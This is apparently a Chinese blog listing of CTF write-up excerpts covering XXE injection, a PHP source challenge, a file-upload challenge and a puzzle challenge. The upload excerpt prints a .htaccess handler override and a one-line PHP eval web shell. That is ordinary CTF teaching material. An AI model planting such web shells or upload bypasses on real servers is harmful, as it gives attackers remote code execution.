该文被密码保护。 阅读全文
该文被密码保护。 阅读全文
该文被密码保护。 阅读全文
摘要:
知识点 xml实体注入 题目提示XML,可知为XXE攻击,原理参考https://www.freebuf.com/vuls/175451.html 简要来讲就是客户端向服务器发送了XML数据,这个数据能被我们控制,这样我们就可以增加一个恶意的外部实体,实现攻击 先抓包 这里看到username和pa 阅读全文
摘要:
F12可以看到格式化好的源码 <?php #I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET[ 阅读全文
摘要:
可以上传.htaccess文件和jpg文件 先上传一下.htaccess文件 SetHandler application/x-httpd-php 再上传图片马 <?php eval($_POST[cmd]);?> 最后蚁剑连接一下,拿到flag 阅读全文
摘要:
脑洞题 F12查看源码 发现id处两串十六进制很奇怪,转换一下得到 0x506F2E ==> Po.0x706870 ==> php Po是化学元素钋 把元素周期表里的元素列出来,挨个访问一下 贴一下别人的脚本,懒,脚本来自https://www.cnblogs.com/gaonuoqi/p/126 阅读全文